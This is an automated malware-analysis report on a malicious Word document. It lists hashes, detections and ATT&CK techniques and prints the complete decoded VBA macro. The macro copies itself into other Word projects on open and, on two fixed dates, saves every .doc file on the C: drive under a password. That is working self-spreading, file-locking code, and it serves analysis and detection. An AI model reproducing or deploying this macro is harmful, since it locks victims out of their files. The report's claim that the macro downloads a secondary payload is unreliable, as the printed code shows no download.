Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9d169927a3e99eba…

MALICIOUS

Office (OLE)

36.5 KB Created: 2002-07-29 16:00:00 Authoring application: Microsoft Word 8.0 First seen: 2018-02-19
MD5: 6156b98d1a645a45d9ed1a59101af1e3 SHA-1: 5f864342e124b2a75cf8c6ec52ee6b9c621fbab9 SHA-256: 9d169927a3e99eba79e7ae903134a30308b7988ea2a511eb435045cc684af4d5
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro attempts to copy itself to other VBA projects and has logic that executes based on specific dates, suggesting it's designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Eight941-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Eight941-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2480 bytes
SHA-256: 5a3c6a2bd95f7fc34d91f3116ed3c9a573ea514f6824462a27c711531ae22d8e
Detection
ClamAV: Doc.Trojan.Eight941-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo 0
Dim i, j As Integer
j = -1
For i = 1 To Application.VBE.VBProjects.Count
    If Application.VBE.VBProjects(i).Name = "Normal" Then
        j = i
    End If
    If Application.VBE.VBProjects(i).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = False Then
        Dim B, l As Integer
            If j > 0 Then
                If Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = True Then
                    B = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
                    l = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                    Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Lines(B, B + l)
                Else
                    B = Me.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
                    l = Me.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                    Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Me.VBProject.VBComponents(1).CodeModule.Lines(B, B + l)
            End If
        End If
    End If
Next i
If (Month(Date) = 11 And Day(Date) = 10) Or (Month(Date) = 7 And Day(Date) = 1) Then
Set fs = Application.FileSearch
    fs.LookIn = "c:\"
    fs.FileName = "*.doc"
    fs.SearchSubFolders = True
    If fs.Execute() > 0 Then
        For i = 1 To fs.FoundFiles.Count
            On Error GoTo Exitsub
            Documents.Open FileName:=fs.FileSearch, ConfirmConversions:=False, ReadOnly:=False, AddToRecentFiles:=False
            Options.AllowFastSave = True
            Options.BackgroundSave = True
            Options.CreateBackup = False
            Options.SavePropertiesPrompt = False
            Options.SaveNormalPrompt = False
            ActiveDocument.Password = "xyz"
            ActiveDocument.Save
            ActiveDocument.Close
Exitsub:
        On Error GoTo 0
        Next i
    End If
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.